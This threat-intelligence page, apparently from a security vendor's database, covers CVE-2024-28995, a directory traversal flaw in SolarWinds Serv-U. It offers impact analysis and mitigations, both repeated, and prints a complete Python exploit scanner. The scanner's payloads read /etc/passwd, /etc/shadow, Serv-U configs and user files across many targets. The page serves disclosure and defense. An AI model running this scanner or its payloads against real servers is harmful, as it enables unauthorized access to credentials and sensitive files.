SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal
SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal
AI Analysis
Technical Summary
The security threat identified as CVE-2024-28995 concerns a directory traversal vulnerability in SolarWinds Serv-U Managed File Transfer Server, specifically versions 15.4.2 HF1 and earlier. This vulnerability allows an unauthenticated remote attacker to exploit the server by crafting specially designed HTTP requests that manipulate the 'InternalDir' and 'InternalFile' parameters. By exploiting this flaw, attackers can traverse directories outside the intended file system boundaries and access sensitive files on the host machine. The exploit targets both Windows and Linux operating systems, leveraging multiple path traversal techniques to read critical files such as Serv-U log files, configuration files, user account data, and system files like /etc/passwd on Linux or Windows system files such as win.ini and boot.ini. The vulnerability does not require authentication or user interaction, making it trivially exploitable remotely over the network. The provided exploit code is written in Python 3 and demonstrates a scanning tool that normalizes target URLs, detects the Serv-U version from HTTP headers, and attempts multiple directory traversal payloads to confirm vulnerability. It uses concurrent threading to scan multiple targets efficiently and identifies the operating system type based on file content indicators. The tool supports custom payloads and wordlists to extend scanning capabilities. The exploit's impact is primarily information disclosure, allowing attackers to read sensitive files that could contain credentials, configuration details, or logs that aid further attacks. Although no direct code execution is indicated, the exposure of such information can lead to severe downstream consequences. No official patch links are provided, but the vulnerability is known and documented with references from NVD and Rapid7. The vulnerability affects Serv-U versions up to 15.4.2 HF1, with later versions presumably patched. The exploit does not require authentication, increasing the risk of widespread exploitation if vulnerable systems are exposed to the internet.
Potential Impact
For European organizations, this vulnerability poses a significant risk to confidentiality and potentially integrity of critical data managed by SolarWinds Serv-U servers. Many enterprises and government agencies in Europe rely on Serv-U for secure file transfers, including sensitive personal data protected under GDPR, intellectual property, and internal logs. Unauthorized access to configuration files and user account data could facilitate lateral movement, privilege escalation, or targeted attacks. The ability to read system files may also reveal system configurations and credentials, increasing the risk of further compromise. Given the exploit requires no authentication and can be executed remotely, exposed Serv-U servers in Europe could be rapidly targeted by attackers, including cybercriminals and state-sponsored actors. This could lead to data breaches, regulatory penalties, and reputational damage. Additionally, the exposure of log files might reveal operational details that could be leveraged for more sophisticated attacks. The medium severity rating reflects the absence of direct remote code execution but acknowledges the criticality of information disclosure in sensitive environments.
Mitigation Recommendations
1. Immediate upgrade: European organizations should prioritize upgrading SolarWinds Serv-U to versions later than 15.4.2 HF1, where this vulnerability is patched. Contact SolarWinds support or check official advisories for the latest secure versions. 2. Network segmentation: Restrict access to Serv-U servers by placing them behind firewalls and VPNs, limiting exposure to trusted internal networks only. 3. Web application firewall (WAF): Deploy WAF rules to detect and block suspicious requests containing directory traversal patterns targeting 'InternalDir' and 'InternalFile' parameters. 4. Monitoring and logging: Enhance monitoring of HTTP requests to Serv-U servers for anomalous patterns indicative of directory traversal attempts and implement alerting. 5. Disable unnecessary services: If Serv-U is not essential, consider disabling or uninstalling it to reduce attack surface. 6. Incident response preparation: Prepare to analyze and respond to potential breaches by reviewing logs and scanning for indicators of compromise related to this vulnerability. 7. Custom payload blocking: Implement input validation and filtering on the Serv-U server or reverse proxy to reject requests with suspicious traversal sequences. 8. Regular vulnerability scanning: Use updated scanning tools that include checks for CVE-2024-28995 to identify vulnerable instances proactively. These measures go beyond generic advice by focusing on immediate patching, network-level protections, and active detection tailored to the specific exploit vectors used by this vulnerability.
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain, Poland, Sweden, Belgium, Switzerland
Indicators of Compromise
- exploit-code: # Exploit Title: SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal # Date: 2025-05-28 # Exploit Author: @ibrahimsql # Exploit Author's github: https://github.com/ibrahimsql # Vendor Homepage: https://www.solarwinds.com/serv-u-managed-file-transfer-server # Software Link: https://www.solarwinds.com/serv-u-managed-file-transfer-server/registration # Version: <= 15.4.2 HF1 # Tested on: Kali Linux 2024.1 # CVE: CVE-2024-28995 # Description: # SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow # attackers to read sensitive files on the host machine. This exploit demonstrates multiple # path traversal techniques to access Serv-U log files and other system files on both # Windows and Linux systems. # # References: # - https://nvd.nist.gov/vuln/detail/cve-2024-28995 # - https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/ # - https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html # Requirements: urllib3>=1.26.0 , colorama>=0.4.4 , requests>=2.25.0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- import argparse import concurrent.futures import json import os import re import sys import time from concurrent.futures import ThreadPoolExecutor, as_completed from urllib.parse import urlparse import requests from colorama import Fore, Back, Style, init # Initialize colorama init(autoreset=True) # Disable SSL warnings try: import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) except ImportError: pass BASE_DIR = os.path.dirname(os.path.abspath(__file__)) BANNER = rf''' {Fore.CYAN} ______ _______ ____ ___ ____ _ _ ____ ___ ___ ___ ____ / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \( _ )/ _ \ / _ \| ___| | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) / _ \ (_) | (_) |___ \ | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ (_) \__, |\__, |___) | \____| \_/ |_____| |_____|\___/_____| |_| |_____\___/ /_/ /_/|____/ {Fore.YELLOW} SolarWinds Serv-U Directory Traversal Exploit {Fore.RED} CVE-2024-28995 by @ibrahimsql {Style.RESET_ALL} ''' class ScanResult: def __init__(self, url, is_vulnerable=False, version=None, os_type=None, file_content=None, path=None): self.url = url self.is_vulnerable = is_vulnerable self.version = version self.os_type = os_type self.file_content = file_content self.path = path self.timestamp = time.strftime("%Y-%m-%d %H:%M:%S") def to_dict(self): return { "url": self.url, "is_vulnerable": self.is_vulnerable, "version": self.version, "os_type": self.os_type, "path": self.path, "timestamp": self.timestamp } def print_banner(): print(BANNER) def normalize_url(url): """Normalize URL to ensure it has http/https protocol.""" if not url.startswith('http'): url = f"https://{url}" return url.rstrip('/') def extract_server_version(headers): """Extract Serv-U version from server headers if available.""" if 'Server' in headers: server_header = headers['Server'] # Look for Serv-U version pattern match = re.search(r'Serv-U/(\d+\.\d+\.\d+)', server_header) if match: return match.group(1) return None def is_vulnerable_version(version): """Check if the detected version is vulnerable (15.4.2 HF1 or lower).""" if not version: return None try: # Split version numbers major, minor, patch = map(int, version.split('.')) # Vulnerable if lower than 15.4.2 HF2 if major < 15: return True elif major == 15: if minor < 4: return True elif minor == 4: if patch <= 2: # We're assuming patch 2 is 15.4.2 HF1 which is vulnerable return True except: pass return False def get_request(url, timeout=15): """Make a GET request to the specified URL.""" try: response = requests.get(url, verify=False, timeout=timeout, allow_redirects=False) return response except requests.RequestException as e: return None def detect_os_type(content): """Detect the operating system type from the file content.""" if any(indicator in content for indicator in ["root:", "bin:x:", "daemon:", "/etc/", "/home/", "/var/"]): return "Linux" elif any(indicator in content for indicator in ["[fonts]", "[extensions]", "[Mail]", "Windows", "ProgramData", "Program Files"]): return "Windows" return None def get_default_payloads(): """Return a list of directory traversal payloads specific to CVE-2024-28995.""" return [ # Windows payloads - Serv-U specific files {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log"}, {"path": "/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/^&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt"}, {"path": "/?InternalDir=\\..\\..\\..\\..\\ProgramData\\RhinoSoft\\Serv-U\\&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt2"}, {"path": "/?InternalDir=../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt3"}, {"path": "/?InternalDir=../../../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Deep"}, {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUStartupLog.txt", "name": "Serv-U Startup Log Alt4"}, {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.Log", "name": "Serv-U Log"}, {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServULog.txt", "name": "Serv-U Log Alt"}, {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUErrorLog.txt", "name": "Serv-U Error Log"}, {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-ErrorLog.txt", "name": "Serv-U Error Log Alt"}, {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.ini", "name": "Serv-U Config"}, {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUAdmin.ini", "name": "Serv-U Admin Config"}, {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=Users.txt", "name": "Serv-U Users"}, {"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=UserAccounts.txt", "name": "Serv-U User Accounts"}, # Verify Windows with various system files {"path": "/?InternalDir=/../../../../windows&InternalFile=win.ini", "name": "Windows ini"}, {"path": "/?InternalDir=\\..\\..\\..\\..\\windows&InternalFile=win.ini", "name": "Windows ini Alt"}, {"path": "/?InternalDir=../../../../windows&InternalFile=win.ini", "name": "Windows ini Alt2"}, {"path": "/?InternalDir=../../../../../../windows&InternalFile=win.ini", "name": "Windows ini Deep"}, {"path": "/?InternalDir=/./../../../Windows/system.ini", "name": "Windows system.ini"}, {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=drivers.ini", "name": "Windows drivers.ini"}, {"path": "/?InternalDir=/./../../../Windows/System32/drivers/etc/&InternalFile=hosts", "name": "Windows hosts"}, {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=config.nt", "name": "Windows config.nt"}, {"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=ntuser.dat", "name": "Windows ntuser.dat"}, {"path": "/?InternalDir=/./../../../Windows/boot.ini", "name": "Windows boot.ini"}, # Verify Linux with various system files {"path": "/?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd", "name": "Linux passwd"}, {"path": "/?InternalDir=/../../../../etc^&InternalFile=passwd", "name": "Linux passwd Alt"}, {"path": "/?InternalDir=\\..\\..\\..\\..\\etc/passwd", "name": "Linux passwd Alt2"}, {"path": "/?InternalDir=../../../../etc&InternalFile=passwd", "name": "Linux passwd Alt3"}, {"path": "/?InternalDir=../../../../../../etc&InternalFile=passwd", "name": "Linux passwd Deep"}, {"path": "/?InternalDir=/./../../../etc/&InternalFile=shadow", "name": "Linux shadow"}, {"path": "/?InternalDir=/./../../../etc/&InternalFile=hosts", "name": "Linux hosts"}, {"path": "/?InternalDir=/./../../../etc/&InternalFile=hostname", "name": "Linux hostname"}, {"path": "/?InternalDir=/./../../../etc/&InternalFile=issue", "name": "Linux issue"}, {"path": "/?InternalDir=/./../../../etc/&InternalFile=os-release", "name": "Linux os-release"} ] def create_custom_payload(directory, filename): """Create a custom payload with the specified directory and filename.""" # Try both encoding styles payloads = [ {"path": f"/?InternalDir=/./../../../{directory}&InternalFile={filename}", "name": f"Custom {filename}"}, {"path": f"/?InternalDir=/../../../../{directory}^&InternalFile={filename}", "name": f"Custom {filename} Alt"}, {"path": f"/?InternalDir=\\..\\..\\..\\..\\{directory}&InternalFile={filename}", "name": f"Custom {filename} Alt2"} ] return payloads def load_wordlist(wordlist_path): """Load custom paths from a wordlist file.""" payloads = [] try: with open(wordlist_path, 'r') as f: for line in f: line = line.strip() if line and not line.startswith('#'): # Check if the line contains a directory and file separated by a delimiter if ':' in line: directory, filename = line.split(':', 1) payloads.extend(create_custom_payload(directory, filename)) else: # Assume it's a complete path payloads.append({"path": line, "name": f"Wordlist: {line[:20]}..."}) return payloads except Exception as e: print(f"{Fore.RED}[!] Error loading wordlist: {e}{Style.RESET_ALL}") return [] def scan_target(url, custom_payloads=None): """Scan a target URL for the CVE-2024-28995 vulnerability.""" url = normalize_url(url) result = ScanResult(url) # Try to get server version first try: response = get_request(url) if response and response.headers: result.version = extract_server_version(response.headers) vulnerable_version = is_vulnerable_version(result.version) if vulnerable_version is False: print(f"{Fore.YELLOW}[*] {url} - Serv-U version {result.version} appears to be patched{Style.RESET_ALL}") # Still continue scanning as version detection may not be reliable except Exception as e: pass # Get all payloads to try payloads = get_default_payloads() if custom_payloads: payloads.extend(custom_payloads) # Try each payload for payload in payloads: full_url = f"{url}{payload['path']}" try: print(f"{Fore.BLUE}[*] Trying: {payload['name']} on {url}{Style.RESET_ALL}") response = get_request(full_url) if response and response.status_code == 200: content = response.text # Check if the response contains meaningful content if len(content) > 100: # Arbitrary threshold to filter out error pages os_type = detect_os_type(content) if os_type: result.is_vulnerable = True result.os_type = os_type result.file_content = content result.path = payload['path'] print(f"{Fore.GREEN}[+] {Fore.RED}VULNERABLE: {url} - {payload['name']} - Detected {os_type} system{Style.RESET_ALL}") # Successful match - no need to try more payloads return result except Exception as e: continue if not result.is_vulnerable: print(f"{Fore.RED}[-] Not vulnerable: {url}{Style.RESET_ALL}") return result def scan_multiple_targets(targets, custom_dir=None, custom_file=None, wordlist=None): """Scan multiple targets using thread pool.""" results = [] custom_payloads = [] # Add custom payloads if specified if custom_dir and custom_file: custom_payloads.extend(create_custom_payload(custom_dir, custom_file)) # Add wordlist payloads if specified if wordlist: custom_payloads.extend(load_wordlist(wordlist)) print(f"{Fore.CYAN}[*] Starting scan of {len(targets)} targets with {len(custom_payloads) + len(get_default_payloads())} payloads{Style.RESET_ALL}") # Use fixed thread count of 10 with ThreadPoolExecutor(max_workers=10) as executor: future_to_url = {executor.submit(scan_target, target, custom_payloads): target for target in targets} for future in as_completed(future_to_url): try: result = future.result() results.append(result) except Exception as e: print(f"{Fore.RED}[!] Error scanning {future_to_url[future]}: {e}{Style.RESET_ALL}") return results def save_results(results, output_file): """Save scan results to a JSON file.""" output_data = [result.to_dict() for result in results] try: with open(output_file, 'w') as f: json.dump(output_data, f, indent=2) print(f"{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}") except Exception as e: print(f"{Fore.RED}[!] Error saving results: {e}{Style.RESET_ALL}") def save_vulnerable_content(result, output_dir): """Save the vulnerable file content to a file.""" if not os.path.exists(output_dir): os.makedirs(output_dir) # Create a safe filename from the URL parsed_url = urlparse(result.url) safe_filename = f"{parsed_url.netloc.replace(':', '_')}.txt" output_path = os.path.join(output_dir, safe_filename) try: with open(output_path, 'w') as f: f.write(f"URL: {result.url}\n") f.write(f"Path: {result.path}\n") f.write(f"Version: {result.version or 'Unknown'}\n") f.write(f"OS Type: {result.os_type or 'Unknown'}\n") f.write(f"Timestamp: {result.timestamp}\n") f.write("\n--- File Content ---\n") f.write(result.file_content) print(f"{Fore.GREEN}[+] Saved vulnerable content to {output_path}{Style.RESET_ALL}") except Exception as e: print(f"{Fore.RED}[!] Error saving content: {e}{Style.RESET_ALL}") def main(): parser = argparse.ArgumentParser(description="CVE-2024-28995 - SolarWinds Serv-U Directory Traversal Scanner") parser.add_argument("-u", "--url", help="Target URL") parser.add_argument("-f", "--file", help="File containing a list of URLs to scan") parser.add_argument("-d", "--dir", help="Custom directory path to read (e.g., ProgramData/RhinoSoft/Serv-U/)") parser.add_argument("-n", "--filename", help="Custom filename to read (e.g., Serv-U-StartupLog.txt)") parser.add_argument("-w", "--wordlist", help="Path to wordlist containing custom paths to try") parser.add_argument("-o", "--output", help="Output JSON file to save results") args = parser.parse_args() print_banner() # Validate arguments if not args.url and not args.file: parser.print_help() print(f"\n{Fore.RED}[!] Error: Either -u/--url or -f/--file is required{Style.RESET_ALL}") sys.exit(1) targets = [] # Get targets if args.url: targets.append(args.url) if args.file: try: with open(args.file, "r") as f: targets.extend([line.strip() for line in f.readlines() if line.strip()]) except Exception as e: print(f"{Fore.RED}[!] Error reading file {args.file}: {e}{Style.RESET_ALL}") sys.exit(1) # Deduplicate targets targets = list(set(targets)) if not targets: print(f"{Fore.RED}[!] No valid targets provided.{Style.RESET_ALL}") sys.exit(1) print(f"{Fore.CYAN}[*] Loaded {len(targets)} target(s){Style.RESET_ALL}") # Set output file output_file = args.output or f"cve_2024_28995_results_{time.strftime('%Y%m%d_%H%M%S')}.json" # Start scanning results = scan_multiple_targets(targets, args.dir, args.filename, args.wordlist) # Process results vulnerable_count = sum(1 for result in results if result.is_vulnerable) print(f"\n{Fore.CYAN}[*] Scan Summary:{Style.RESET_ALL}") print(f"{Fore.CYAN}[*] Total targets: {len(results)}{Style.RESET_ALL}") print(f"{Fore.GREEN if vulnerable_count > 0 else Fore.RED}[*] Vulnerable targets: {vulnerable_count}{Style.RESET_ALL}") # Save results save_results(results, output_file) # Save vulnerable file contents for result in results: if result.is_vulnerable and result.file_content: save_vulnerable_content(result, "vulnerable_files") print(f"\n{Fore.GREEN}[+] Scan completed successfully!{Style.RESET_ALL}") if __name__ == "__main__": try: main() except KeyboardInterrupt: print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}") sys.exit(0) except Exception as e: print(f"\n{Fore.RED}[!] An error occurred: {e}{Style.RESET_ALL}") sys.exit(1)
SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal
Description
SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal
AI-Powered Analysis
Technical Analysis
The security threat identified as CVE-2024-28995 concerns a directory traversal vulnerability in SolarWinds Serv-U Managed File Transfer Server, specifically versions 15.4.2 HF1 and earlier. This vulnerability allows an unauthenticated remote attacker to exploit the server by crafting specially designed HTTP requests that manipulate the 'InternalDir' and 'InternalFile' parameters. By exploiting this flaw, attackers can traverse directories outside the intended file system boundaries and access sensitive files on the host machine. The exploit targets both Windows and Linux operating systems, leveraging multiple path traversal techniques to read critical files such as Serv-U log files, configuration files, user account data, and system files like /etc/passwd on Linux or Windows system files such as win.ini and boot.ini. The vulnerability does not require authentication or user interaction, making it trivially exploitable remotely over the network. The provided exploit code is written in Python 3 and demonstrates a scanning tool that normalizes target URLs, detects the Serv-U version from HTTP headers, and attempts multiple directory traversal payloads to confirm vulnerability. It uses concurrent threading to scan multiple targets efficiently and identifies the operating system type based on file content indicators. The tool supports custom payloads and wordlists to extend scanning capabilities. The exploit's impact is primarily information disclosure, allowing attackers to read sensitive files that could contain credentials, configuration details, or logs that aid further attacks. Although no direct code execution is indicated, the exposure of such information can lead to severe downstream consequences. No official patch links are provided, but the vulnerability is known and documented with references from NVD and Rapid7. The vulnerability affects Serv-U versions up to 15.4.2 HF1, with later versions presumably patched. The exploit does not require authentication, increasing the risk of widespread exploitation if vulnerable systems are exposed to the internet.
Potential Impact
For European organizations, this vulnerability poses a significant risk to confidentiality and potentially integrity of critical data managed by SolarWinds Serv-U servers. Many enterprises and government agencies in Europe rely on Serv-U for secure file transfers, including sensitive personal data protected under GDPR, intellectual property, and internal logs. Unauthorized access to configuration files and user account data could facilitate lateral movement, privilege escalation, or targeted attacks. The ability to read system files may also reveal system configurations and credentials, increasing the risk of further compromise. Given the exploit requires no authentication and can be executed remotely, exposed Serv-U servers in Europe could be rapidly targeted by attackers, including cybercriminals and state-sponsored actors. This could lead to data breaches, regulatory penalties, and reputational damage. Additionally, the exposure of log files might reveal operational details that could be leveraged for more sophisticated attacks. The medium severity rating reflects the absence of direct remote code execution but acknowledges the criticality of information disclosure in sensitive environments.
Mitigation Recommendations
1. Immediate upgrade: European organizations should prioritize upgrading SolarWinds Serv-U to versions later than 15.4.2 HF1, where this vulnerability is patched. Contact SolarWinds support or check official advisories for the latest secure versions. 2. Network segmentation: Restrict access to Serv-U servers by placing them behind firewalls and VPNs, limiting exposure to trusted internal networks only. 3. Web application firewall (WAF): Deploy WAF rules to detect and block suspicious requests containing directory traversal patterns targeting 'InternalDir' and 'InternalFile' parameters. 4. Monitoring and logging: Enhance monitoring of HTTP requests to Serv-U servers for anomalous patterns indicative of directory traversal attempts and implement alerting. 5. Disable unnecessary services: If Serv-U is not essential, consider disabling or uninstalling it to reduce attack surface. 6. Incident response preparation: Prepare to analyze and respond to potential breaches by reviewing logs and scanning for indicators of compromise related to this vulnerability. 7. Custom payload blocking: Implement input validation and filtering on the Serv-U server or reverse proxy to reject requests with suspicious traversal sequences. 8. Regular vulnerability scanning: Use updated scanning tools that include checks for CVE-2024-28995 to identify vulnerable instances proactively. These measures go beyond generic advice by focusing on immediate patching, network-level protections, and active detection tailored to the specific exploit vectors used by this vulnerability.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52311
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal
# Exploit Title: SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal # Date: 2025-05-28 # Exploit Author: @ibrahimsql # Exploit Author's github: https://github.com/ibrahimsql # Vendor Homepage: https://www.solarwinds.com/serv-u-managed-file-transfer-server # Software Link: https://www.solarwinds.com/serv-u-managed-file-transfer-server/registration # Version: <= 15.4.2 HF1 # Tested on: Kali Linux 2024.1 # CVE: CVE-2024-28995 # Description: # SolarWinds Serv-U was susceptible to a directory traver
... (17831 more characters)
Threat ID: 68489d787e6d765d51d523ed
Added to database: 6/10/2025, 9:02:48 PM
Last enriched: 6/11/2025, 9:16:34 PM
Last updated: 8/12/2025, 10:32:10 AM
Views: 19
Related Threats
U.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs
MediumU.S. CISA adds Microsoft Internet Explorer, Microsoft Office Excel, and WinRAR flaws to its Known Exploited Vulnerabilities catalog
MediumCisco ISE 3.0 - Remote Code Execution (RCE)
CriticalCisco ISE 3.0 - Authorization Bypass
Mediumprojectworlds Online Admission System 1.0 - SQL Injection
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.